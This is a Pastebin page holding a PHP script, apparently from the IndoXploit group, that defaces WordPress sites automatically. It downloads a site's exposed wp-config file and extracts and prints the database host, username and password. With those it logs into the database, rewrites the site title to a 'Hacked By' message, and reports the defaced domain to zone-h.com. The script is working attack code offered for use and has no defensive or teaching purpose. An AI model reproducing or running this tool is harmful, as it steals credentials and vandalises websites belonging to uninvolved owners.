Tu5b0l3d

link_title.php

Apr 16th, 2016
863
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.64 KB | None | 0 0
  1. <?php
  2. // Tu5b0l3d -IndoXploit-
  3. // Wordpress Auto Deface Title Melalui link Config.
  4.  
  5. error_reporting(0);
  6.     if($_POST){
  7.  
  8.         function ambilKata($param, $kata1, $kata2){
  9.     if(strpos($param, $kata1) === FALSE) return FALSE;
  10.     if(strpos($param, $kata2) === FALSE) return FALSE;
  11.     $start = strpos($param, $kata1) + strlen($kata1);
  12.     $end = strpos($param, $kata2, $start);
  13.     $return = substr($param, $start, $end - $start);
  14.     return $return;
  15. }
  16.  
  17.     function anucurl($sites){
  18.         $ch1 = curl_init ("$sites");
  19. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  20. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  21. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  22. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  23. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  24. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  25. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  26. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  27. $data = curl_exec ($ch1);
  28. return $data;
  29.     }
  30.  
  31.  
  32.         $link = $_POST['link'];
  33.         $script = $_POST['script'];
  34.         if($script==""){
  35.             echo "<center><h1>Isi Dulu Hacked By</h1></center>";
  36.         }
  37.         else{
  38.  
  39.         $file = anucurl($link);
  40.  
  41.         $host = ambilkata($file,"DB_HOST', '","'");
  42.                     $username = ambilkata($file,"DB_USER', '","'");
  43.                     $password = ambilkata($file,"DB_PASSWORD', '","'");
  44.                     $db = ambilkata($file,"DB_NAME', '","'");
  45.                     $dbprefix = ambilkata($file,"table_prefix  = '","'");
  46.                     $sue = $db.".".$dbprefix."options";
  47.                    
  48.  
  49.  
  50.                     echo "# Db Host: $host<br>";
  51.                     echo "# Db user: $username<br>";
  52.                     echo "# Db Password: $password<br>";
  53.                     echo "# Db name: $db<br>";
  54.                     echo "# Table_Prefix: $dbprefix<br>";      
  55.  
  56.         mysql_connect($host,$username,$password);
  57.         mysql_select_db($db);
  58.  
  59.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  60.         $r2=mysql_fetch_array($tampil2);
  61.         $target = $r2[option_value];
  62.          echo "# $target<br>";
  63.        
  64.          mysql_query("UPDATE $sue SET option_value='$script' WHERE option_name='blogname'");
  65.  
  66. $bs = anucurl($target);
  67.  
  68.  if(preg_match("#hacked#si",$bs)){
  69.                         echo "# <font color='green'>berhasil mepes...</font><br>";
  70.                         echo "# <a href='$target' target='_blank'>$target</a><br>";
  71.                         echo "-> zone-h: ";
  72.                     $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  73.                         curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  74.                         curl_setopt ($ch3, CURLOPT_POST, 1);
  75.                         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=ID-IM&domain1=$target&hackmode=1&reason=1&submit=Send");  // here put ur name on zone-h
  76.                        
  77.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  78.                 echo  " Ok ";
  79.         }else{
  80.                 echo " No";
  81.                        
  82.                     }
  83.                 }
  84.                     else{
  85.                         echo "# <font color='red'>gagal mepes...</font><br>";
  86.  
  87.                        
  88.                     }
  89.                 }
  90.  
  91.  
  92.     }else{
  93.             echo '<html>
  94.     <head>
  95.         <title>Created By IndoXploit Just For Wordpress</title>
  96.     </head>
  97.  
  98.     <body>
  99.             <center>
  100.                 <font face="arial"><h2>INDO<font color="red">}{</font>PLOIT <br><br> Wordpress Auto Deface </h2><hr></font>
  101.                         <table>
  102.                             <tr><td><form method="post" action="?action"></td></tr>
  103.                             <tr><td><input type="text" name="link" placeholder="link config"></td></tr>
  104.                             <tr><td><input type="text" name="script" placeholder="Hacked By Tu5b0l3d"> //Must Hacked</td></tr>
  105.  
  106.                             <tr><td><input type="submit" value="Submit"></td></tr>
  107.                             </form>
  108.                         </table>
  109.                        
  110.             </center>
  111.  
  112.     </body>
  113. </html>';
  114.         }
  115.  
  116. ?>
Advertisement
Add Comment
Please, Sign In to add comment